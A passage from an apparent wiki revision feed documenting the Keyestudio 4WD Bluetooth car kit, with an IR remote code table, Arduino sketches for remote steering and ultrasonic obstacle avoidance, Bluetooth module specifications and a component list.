  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF18E7&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16718055&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF7A85&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16743045&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;7&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF10EF&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16716015&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF38C7&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16726215&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;9&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF5AA5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16734885&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;0&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF4AB5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16730805&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;OK&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF02FD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16712445&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;*&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF32BD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16728765&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;#&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF52AD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16732845&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:IR_Receiver_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
==== Output IR-Remote control values ====&lt;br /&gt;
My intention is to steer the car with the IR-Remote-Control included in the kit. This sketch outputs the values the IR-Receiver gets from the remote control so I know the values I&#039;m working with.&lt;br /&gt;
&lt;br /&gt;
 # include &amp;lt;IRremote.h&amp;gt;&lt;br /&gt;
 int RECV_PIN = 11;&lt;br /&gt;
 IRrecv irrecv(RECV_PIN);&lt;br /&gt;
 decode_results results;&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     Serial.begin(9600);&lt;br /&gt;
     irrecv.enableIRIn(); // Start the receiver&lt;br /&gt;
 }&lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     if (irrecv.decode(&amp;amp;results))&lt;br /&gt;
     {&lt;br /&gt;
         Serial.println(results.value, HEX);&lt;br /&gt;
         irrecv.resume(); // Receive the next value&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
==== Steer car with IR-Remote control ====&lt;br /&gt;
 # include &amp;lt;IRremote.h&amp;gt;&lt;br /&gt;
 int IN1 = 5;&lt;br /&gt;
 int IN2 = 6;&lt;br /&gt;
 int IN3 = 7;&lt;br /&gt;
 int IN4 = 8;&lt;br /&gt;
 int ENA = 9;&lt;br /&gt;
 int ENB = 10;&lt;br /&gt;
 int RECV_PIN = 11;&lt;br /&gt;
 IRrecv irrecv(RECV_PIN);&lt;br /&gt;
 decode_results results;&lt;br /&gt;
 decode_results lastResult;&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     for (int i = 5; i &amp;lt; 11; i++)&lt;br /&gt;
     {&lt;br /&gt;
         pinMode(i, OUTPUT);&lt;br /&gt;
     }&lt;br /&gt;
     Serial.begin(9600);&lt;br /&gt;
     irrecv.enableIRIn(); // Start the receiver&lt;br /&gt;
 }&lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     if (irrecv.decode(&amp;amp;results))&lt;br /&gt;
     {&lt;br /&gt;
         if (results.value != lastResult.value)&lt;br /&gt;
         {&lt;br /&gt;
             switch (results.value)&lt;br /&gt;
             {&lt;br /&gt;
                 //ArrowUp&lt;br /&gt;
                 case 16736925:&lt;br /&gt;
                     driveForward();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //ArrowDown&lt;br /&gt;
                 case 16754775:&lt;br /&gt;
                     driveReverse();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //ArrowRight&lt;br /&gt;
                 case 16761405:&lt;br /&gt;
                     turnClockwise();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //ArrowLeft&lt;br /&gt;
                 case 16720605:&lt;br /&gt;
                     turnCounterClockwise();&lt;br /&gt;
                     break;&lt;br /&gt;
                 //Ok&lt;br /&gt;
                 case 16712445:&lt;br /&gt;
                     brake();&lt;br /&gt;
                     break;&lt;br /&gt;
             }&lt;br /&gt;
             lastResult = results;&lt;br /&gt;
         }&lt;br /&gt;
         irrecv.resume(); // Receive the next value&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, HIGH);&lt;br /&gt;
     digitalWrite(IN4, LOW);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, HIGH);&lt;br /&gt;
     digitalWrite(IN2, LOW);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, HIGH);&lt;br /&gt;
     digitalWrite(IN2, LOW);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, HIGH);&lt;br /&gt;
     digitalWrite(IN4, LOW);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 150);&lt;br /&gt;
     analogWrite(ENB, 150);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void turnCounterClockwise()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 150);&lt;br /&gt;
     analogWrite(ENB, 150);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Bluetooth Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Bluetooth Protocol: Bluetooth 2.1+ EDR Standard&lt;br /&gt;
* USB Protocol: USB v1.1/2.0&lt;br /&gt;
* Operating Frequency: 2.4GHz ISM Frequency Band&lt;br /&gt;
* Modulation Mode: Gauss Frequency Shift Keying&lt;br /&gt;
* Transmit Power: ≤ 4dBm, Second Stage&lt;br /&gt;
* Sensitivity: ≤-84dBm at 0.1% Bit Error Rate&lt;br /&gt;
* Transmission Speed: 2.1Mbps(Max)/160 kbps(Asynchronous)； 1Mbps/1Mbps(Synchronous)&lt;br /&gt;
* Safety Feature: Authentication and Encryption&lt;br /&gt;
* Supported Configuration: Bluetooth Serial Port (major and minor)&lt;br /&gt;
* Supply Voltage: 5V DC 50mA &lt;br /&gt;
* Operating Temperature: -20 to 55℃&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Bluetooth_Module_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
== Obstacle Avoidance ==&lt;br /&gt;
This code measures the distance between the car and the object in front of it. If the distance between both is under 15cm the car will turn 180° and continue to drive forward. I used the Ultra-Sonic Sensor to measure the distance and the I2C-Display to display the current distance.&lt;br /&gt;
=== Code === &lt;br /&gt;
 #define echoPin 3 // Echo Pin&lt;br /&gt;
 #define trigPin 4 // Trigger Pin&lt;br /&gt;
 &lt;br /&gt;
 #include &amp;lt;Wire.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;LiquidCrystal_I2C.h&amp;gt;&lt;br /&gt;
 int maximumRange = 200; // Maximum range needed&lt;br /&gt;
 int minimumRange = 0; // Minimum range needed&lt;br /&gt;
 long duration, distance; // Duration used to calculate distance&lt;br /&gt;
 LiquidCrystal_I2C lcd(0x27,3,1);&lt;br /&gt;
 bool state = true;&lt;br /&gt;
 int IN1 = 5;&lt;br /&gt;
 int IN2 = 6;&lt;br /&gt;
 int IN3 = 7;&lt;br /&gt;
 int IN4 = 8;&lt;br /&gt;
 int ENA = 9;&lt;br /&gt;
 int ENB = 10;&lt;br /&gt;
 &lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     Serial.begin(9600);&lt;br /&gt;
     pinMode(trigPin, OUTPUT);&lt;br /&gt;
     pinMode(echoPin, INPUT);&lt;br /&gt;
     for (int i = 5; i &amp;lt; 11; i++)&lt;br /&gt;
     {&lt;br /&gt;
         pinMode(i, OUTPUT);&lt;br /&gt;
     }&lt;br /&gt;
     lcd.init();&lt;br /&gt;
     lcd.backlight();&lt;br /&gt;
     delay(5000);&lt;br /&gt;
     driveForward();&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     /* The following trigPin/echoPin cycle is used to determine the&lt;br /&gt;
      distance of the nearest object by bouncing soundwaves off of it. */&lt;br /&gt;
     digitalWrite(trigPin, LOW);&lt;br /&gt;
     delayMicroseconds(2);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(trigPin, HIGH);&lt;br /&gt;
     delayMicroseconds(10);&lt;br /&gt;
     digitalWrite(trigPin, LOW);&lt;br /&gt;
     duration = pulseIn(echoPin, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     //Calculate the distance (in cm) based on the speed of sound.&lt;br /&gt;
     distance = duration / 58.3;&lt;br /&gt;
 &lt;br /&gt;
     if (distance &amp;gt;= maximumRange || distance &amp;lt;= minimumRange)&lt;br /&gt;
     {&lt;br /&gt;
         /* Send a negative number to computer and Turn LED ON &lt;br /&gt;
         to indicate &amp;quot;out of range&amp;quot; */&lt;br /&gt;
         lcd.clear();&lt;br /&gt;
         lcd.setCursor(3, 0);&lt;br /&gt;
         lcd.print(&amp;quot;-1&amp;quot;);&lt;br /&gt;
         Serial.println(&amp;quot;-1&amp;quot;);&lt;br /&gt;
     }&lt;br /&gt;
     else&lt;br /&gt;
     {&lt;br /&gt;
         /* Send the distance to the computer using Serial protocol, and&lt;br /&gt;
         turn LED OFF to indicate successful reading. */&lt;br /&gt;
         if (distance &amp;lt;= 15 &amp;amp;&amp;amp; state != false)&lt;br /&gt;
         {&lt;br /&gt;
             state = false;&lt;br /&gt;
             brake();&lt;br /&gt;
             delay(200);&lt;br /&gt;
             turnClockwise();&lt;br /&gt;
             delay(780);&lt;br /&gt;
             state = true;&lt;br /&gt;
             driveForward();&lt;br /&gt;
         }&lt;br /&gt;
         else if (distance &amp;gt;= 30 &amp;amp;&amp;amp; state != true)&lt;br /&gt;
         {&lt;br /&gt;
             state = true;&lt;br /&gt;
             driveForward();&lt;br /&gt;
         }&lt;br /&gt;
         lcd.clear();&lt;br /&gt;
         lcd.setCursor(3, 0);&lt;br /&gt;
         lcd.print(distance);&lt;br /&gt;
         Serial.println(distance);&lt;br /&gt;
     }&lt;br /&gt;
     //Delay 50ms before next reading.&lt;br /&gt;
     delay(50);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, HIGH);&lt;br /&gt;
     digitalWrite(IN4, LOW);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, HIGH);&lt;br /&gt;
     digitalWrite(IN2, LOW);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 100);&lt;br /&gt;
     analogWrite(ENB, 100);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
     digitalWrite(IN1, LOW);&lt;br /&gt;
     digitalWrite(IN2, HIGH);&lt;br /&gt;
 &lt;br /&gt;
     digitalWrite(IN3, LOW);&lt;br /&gt;
     digitalWrite(IN4, HIGH);&lt;br /&gt;
     delay(150);&lt;br /&gt;
     analogWrite(ENA, 200);&lt;br /&gt;
     analogWrite(ENB, 200);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
     analogWrite(ENA, 0);&lt;br /&gt;
     analogWrite(ENB, 0);&lt;br /&gt;
 }&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Smart Robot Car Kit Bluetooth 4WD keyestudio]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wiki.keyestudio.com/Ks0192_keyestudio_4WD_Bluetooth_Multi-functional_Car&lt;br /&gt;
* https://www.youtube.com/watch?v=GAqvzCXEUSw&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5998</id>
		<title>Keyestudio 4WD Bluetooth multifunctional car kit</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5998"/>
		<updated>2021-02-19T14:21:45Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Rotate Clockwise */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the keyestudio 4WD Bluetooth Multi-functional Car Kit. The documentation contains schematics, tipps and code for the car. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Arduino IDE&lt;br /&gt;
* 18650 Batteries (not included in kit)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
=== Component list ===&lt;br /&gt;
&amp;lt;table style=&amp;quot;border: solid 1px black; width:50%   border-collapse: collapse; border-spacing: 0;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:30%; padding: 5px 10px; text-align: center;&amp;quot;&amp;gt;Product Name&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;Quantity&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio UNO R3&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Shield V5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio L298N Motor Shield&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Bluetooh HC-06&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;I2C 1602 LCD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Line Tracking Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;HC-SR04 Ultrasonic Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Digital IR Receiver Module&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Top PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Bottom PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Plastic Platform&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;IR Remote Control&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Toggle Switch + Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;18650 Battery Holder&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
